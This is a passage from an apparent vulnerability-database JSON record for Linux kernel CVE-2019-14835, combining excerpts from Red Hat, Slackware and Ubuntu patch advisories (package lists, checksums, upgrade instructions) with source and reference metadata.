7.5):\n\nSource:\nkernel-3.10.0-862.41.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm\nkernel-doc-3.10.0-862.41.2.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-headers-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm\nperf-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional EUS (v. 
7.5):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 7.5):\n\nSource:\nkernel-3.10.0-862.41.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-862.41.2.el7.noarch.rpm\nkernel-doc-3.10.0-862.41.2.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-devel-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-headers-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.ppc64.rpm\nperf-3.10.0-862.41.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-8
62.41.2.el7.ppc64le.rpm\npython-perf-3.10.0-862.41.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-862.41.2.el7.s390x.rpm\nkernel-devel-3.10.0-862.41.2.el7.s390x.rpm\nkernel-headers-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-862.41.2.el7.s390x.rpm\nperf-3.10.0-862.41.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\npython-perf-3.10.0-862.41.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-devel-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-headers-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-862.41.2.el7.x86_64.rpm\nperf-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 
7.5):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-862.41.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-862.41.2.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-14835\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/kernel-vhost\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXYiswNzjgjWX9erEAQhd1g//WDRHc/Prfvv6JNbmMdvxJvpXZx3Wc535\n/AQUarXoBalyktM8ucRBOg28X4Eq7Y8WF9jbdoyp8iIrirZQdA7+4yEI6O6GnY2m\nM3sx6Kw9jbNFxP72zUxOK6hMuR8pimz0RWIdc8vQgfA3UuTyjjfvHjjr361FCRHF\nbjRgMl4sOuMbwrxs/h6NgeKVLUw5EoHTrJ6Hc8Vv5wIjyir1bSMH0aikAirkoZ0Y\nWtR3Z7lvODMcY4wKXecyVc/xslg1ioZhS9gGsG+TJ2fUMw7sZr5ERccc+1UWGFUa\n2knyaFEQUSEYweDEsYm3zR3G75rNljzX8VZaEN/ShQwIA46k8J/Z7Wdy7DC6e66/\nFUOKdD8MEjOieoDLfXZpOlBJ1UWBCC8/HYuP7ujFpiCvN7zFBd/HYAIUnhC+y5wg\nXHTc05QJbalfHAntTQRzlwS8Uc746PjBlykrWETVFwyVu3u1cfxbSYsP4TA/6yvE\nAUK1uea0hbg6RgaceZfyIV8YIaaJB5fmS4Ula4p4ppBf5HuF+L0eRl5zYzhA0Ryl\nNSNr5YeIrmCVr6UjEBNZlClSOwi4RN2pQ1VmAcbrsACYuOcKVD1PtoCH087ISIjP\nLej+FZxY423yc9s1/2RxoVIgYwInTzttvauDR8ws4bDmxbPzWrlpT7ciee5kdSQr\njZmQ2x5ylP4=z5bF\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.199/*: Upgraded. \n These updates fix various bugs and security issues. \n If you use lilo to boot your machine, be sure lilo.conf points to the correct\n kernel and initrd and run lilo as root to update the bootloader. \n If you use elilo to boot your machine, you should run eliloconfig to copy the\n kernel and initrd to the EFI System Partition. 
\n For more information, see:\n Fixed in 4.4.191:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117\n Fixed in 4.4.193:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835\n Fixed in 4.4.194:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821\n Fixed in 4.4.195:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054\n Fixed in 4.4.196:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215\n Fixed in 4.4.197:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976\n Fixed in 4.4.198:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133\n Fixed in 4.4.199:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. 
\n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\n\n0e523f42e759ecc2399f36e37672f110 kernel-generic-4.4.199-i586-1.txz\nee6451f5362008b46fee2e08e3077b21 kernel-generic-smp-4.4.199_smp-i686-1.txz\na8338ef88f2e3ea9c74d564c36ccd420 kernel-headers-4.4.199_smp-x86-1.txz\ncd9e9c241e4eec2fba1dae658a28870e 
kernel-huge-4.4.199-i586-1.txz\n842030890a424023817d42a83a86a7f4 kernel-huge-smp-4.4.199_smp-i686-1.txz\n257db024bb4501548ac9118dbd2d9ae6 kernel-modules-4.4.199-i586-1.txz\n96377cbaf7bca55aaca70358c63151a7 kernel-modules-smp-4.4.199_smp-i686-1.txz\n0673e86466f9e624964d95107cf6712f kernel-source-4.4.199_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n6d1ff428e7cad6caa8860acc402447a1 kernel-generic-4.4.199-x86_64-1.txz\ndadc091dc725b8227e0d1e35098d6416 kernel-headers-4.4.199-x86-1.txz\nf5f4c034203f44dd1513ad3504c42515 kernel-huge-4.4.199-x86_64-1.txz\na5337cd8b2ca80d4d93b9e9688e42b03 kernel-modules-4.4.199-x86_64-1.txz\n5dd6e46c04f37b97062dc9e52cc38add kernel-source-4.4.199-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.199-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.199 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. 
\n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file. Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. These packages include redhat-release-virtualization-host,\novirt-node, and rhev-hypervisor. RHVH features a Cockpit user\ninterface for monitoring the host\u0027s resources and performing administrative\ntasks. \n\nThe following packages have been upgraded to a later upstream version:\nredhat-release-virtualization-host (4.2), redhat-virtualization-host (4.2). 
(CVE-2019-15031)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n linux-image-3.13.0-173-generic 3.13.0-173.224\n linux-image-3.13.0-173-generic-lpae 3.13.0-173.224\n linux-image-3.13.0-173-lowlatency 3.13.0-173.224\n linux-image-3.13.0-173-powerpc-e500 3.13.0-173.224\n linux-image-3.13.0-173-powerpc-e500mc 3.13.0-173.224\n linux-image-3.13.0-173-powerpc-smp 3.13.0-173.224\n linux-image-3.13.0-173-powerpc64-emb 3.13.0-173.224\n linux-image-3.13.0-173-powerpc64-smp 3.13.0-173.224\n linux-image-4.15.0-1059-azure 4.15.0-1059.64~14.04.1\n linux-image-4.4.0-1054-aws 4.4.0-1054.58\n linux-image-4.4.0-164-generic 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-generic-lpae 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-lowlatency 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-powerpc-e500mc 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-powerpc-smp 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-powerpc64-emb 4.4.0-164.192~14.04.1\n linux-image-4.4.0-164-powerpc64-smp 4.4.0-164.192~14.04.1\n linux-image-aws 4.4.0.1054.55\n linux-image-azure 4.15.0.1059.45\n linux-image-generic 3.13.0.173.184\n linux-image-generic-lpae 3.13.0.173.184\n linux-image-generic-lpae-lts-xenial 4.4.0.164.143\n linux-image-generic-lts-xenial 4.4.0.164.143\n linux-image-lowlatency 3.13.0.173.184\n linux-image-lowlatency-lts-xenial 4.4.0.164.143\n linux-image-powerpc-e500 3.13.0.173.184\n linux-image-powerpc-e500mc 3.13.0.173.184\n linux-image-powerpc-e500mc-lts-xenial 4.4.0.164.143\n linux-image-powerpc-smp 3.13.0.173.184\n linux-image-powerpc-smp-lts-xenial 4.4.0.164.143\n linux-image-powerpc64-emb 3.13.0.173.184\n linux-image-powerpc64-emb-lts-xenial 4.4.0.164.143\n linux-image-powerpc64-smp 3.13.0.173.184\n linux-image-powerpc64-smp-lts-xenial 4.4.0.164.143\n linux-image-server 3.13.0.173.184\n linux-image-virtual 3.13.0.173.184\n linux-image-virtual-lts-xenial 4.4.0.164.143\n\nUbuntu 12.04 ESM:\n 
linux-image-3.13.0-173-generic 3.13.0-173.224~12.04.1\n linux-image-3.13.0-173-generic-lpae 3.13.0-173.224~12.04.1\n linux-image-3.13.0-173-lowlatency 3.13.0-173.224~12.04.1\n linux-image-3.2.0-143-generic 3.2.0-143.190\n linux-image-3.2.0-143-generic-pae 3.2.0-143.190\n linux-image-3.2.0-143-highbank 3.2.0-143.190\n linux-image-3.2.0-143-omap 3.2.0-143.190\n linux-image-3.2.0-143-powerpc-smp 3.2.0-143.190\n linux-image-3.2.0-143-powerpc64-smp 3.2.0-143.190\n linux-image-3.2.0-143-virtual 3.2.0-143.190\n linux-image-generic 3.2.0.143.158\n linux-image-generic-lpae-lts-trusty 3.13.0.173.161\n linux-image-generic-lts-trusty 3.13.0.173.161\n linux-image-generic-pae 3.2.0.143.158\n linux-image-highbank 3.2.0.143.158\n linux-image-omap 3.2.0.143.158\n linux-image-powerpc 3.2.0.143.158\n linux-image-powerpc-smp 3.2.0.143.158\n linux-image-powerpc64-smp 3.2.0.143.158\n linux-image-server 3.2.0.143.158\n linux-image-virtual 3.2.0.143.158\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 7) - noarch, x86_64\n\n3",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14835"
},
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "PACKETSTORM",
"id": "154514"
},
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154951"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "155212"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154513"
},
{
"db": "PACKETSTORM",
"id": "154572"
},
{
"db": "PACKETSTORM",
"id": "154540"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2019-14835",
"trust": 2.1
},
{
"db": "PACKETSTORM",
"id": "155212",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "154951",
"trust": 1.2
},
{
"db": "PACKETSTORM",
"id": "154572",
"trust": 1.2
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/10/03/1",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/10/09/7",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/09/24/1",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/10/09/3",
"trust": 1.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/09/17/1",
"trust": 1.1
},
{
"db": "PACKETSTORM",
"id": "154538",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154513",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154602",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154514",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154540",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154565",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154659",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "154539",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154570",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154562",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154566",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154563",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154564",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154541",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154558",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154585",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "154569",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-201909-807",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-146821",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "PACKETSTORM",
"id": "154514"
},
{
"db": "PACKETSTORM",
"id": "154602"
},
{
"db": "PACKETSTORM",
"id": "154951"
},
{
"db": "PACKETSTORM",
"id": "154565"
},
{
"db": "PACKETSTORM",
"id": "155212"
},
{
"db": "PACKETSTORM",
"id": "154538"
},
{
"db": "PACKETSTORM",
"id": "154659"
},
{
"db": "PACKETSTORM",
"id": "154513"
},
{
"db": "PACKETSTORM",
"id": "154572"
},
{
"db": "PACKETSTORM",
"id": "154540"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"id": "VAR-201909-0695",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
}
],
"trust": 0.40555555
},
"last_update_date": "2026-03-09T20:38:57.948000Z",
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-120",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146821"
},
{
"db": "NVD",
"id": "CVE-2019-14835"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2828"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2830"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2866"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2901"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:2924"
},
{
"trust": 1.1,
"url": "https://seclists.org/bugtraq/2019/sep/41"
},
{
"trust": 1.1,
"url": "https://seclists.org/bugtraq/2019/nov/11"
},
{
"trust": 1.1,
"url": "https://www.debian.org/security/2019/dsa-4531"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/yw3qnmpenpfegvtofpsnobl7jeijs25p/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kqfy6jyfiq2vfq7qcsxpwtul5zdncjl5/"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhba-2019:2824"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2827"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2829"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2854"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2862"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2863"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2864"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2865"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2867"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2869"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2889"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2899"
},
{
"trust": 1.1,
"url": "https://access.redhat.com/errata/rhsa-2019:2900"
},
{
"trust": 1.1,
"url": "https://usn.ubuntu.com/4135-1/"
},
{
"trust": 1.1,
"url": "https://usn.ubuntu.com/4135-2/"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/09/24/1"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/10/03/1"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/10/09/3"
},
{
"trust": 1.1,
"url": "http://www.openwall.com/lists/oss-security/2019/10/09/7"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/154572/kernel-live-patch-security-notice-lsn-0056-1.html"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
},
{
"trust": 1.1,
"url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
},
{
"trust": 1.1,
"url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-qemu-en"
},
{
"trust": 1.1,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14835"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
},
{
"trust": 1.1,
"url": "https://www.openwall.com/lists/oss-security/2019/09/17/1"
},
{
"trust": 1.1,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
},
{
"trust": 1.1,
